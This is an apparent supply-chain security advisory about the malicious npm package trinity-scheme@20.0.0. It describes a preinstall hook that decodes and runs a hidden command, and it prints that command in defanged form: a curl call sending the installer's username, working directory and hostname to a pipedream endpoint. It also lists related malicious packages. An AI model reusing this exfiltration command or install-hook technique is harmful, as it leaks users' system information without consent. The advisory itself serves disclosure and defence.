trinity-scheme@20.0.0
Malicious code in trinity-scheme (npm)
T1059.007 · JavaScriptT1082 · System Information DiscoveryT1071.001 · Web ProtocolsT1041 · Exfiltration Over C2 Channel
Analysis
The preinstall hook (node preinstall.js) reads a hex-encoded command from preinstall.json, decodes it, and executes it via child_process.exec. The decoded command is: curl hxxps://eo7o7j442dx6yl6[.]m[.]pipedream[.]net/ -d "whoami=`whoami`&pwd=`pwd`&hostname=`hostname`" — exfiltrating the installer's username, current working directory, and hostname to a pipedream[.]net endpoint on every install.
- analyzed by
- Leitwacht
- first seen
- Jul 11, 2026, 10:40 AM
- analyzed
- Jul 11, 2026, 10:40 AM
Related advisories
- chai-as-doc@2.3.5
- @meziizana/frontend-logger@10.0.0
- rtc-integration-frontend-sdk@99.9.0
- ohcm-culture-formatting@5.0.0
- env-fast@1.0.0
- ap3-components-ui@9.999.0
- @espn-ping/react-dmed-oauth@666.0.0
- fury_frontend-andes-ui@99.9.5
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.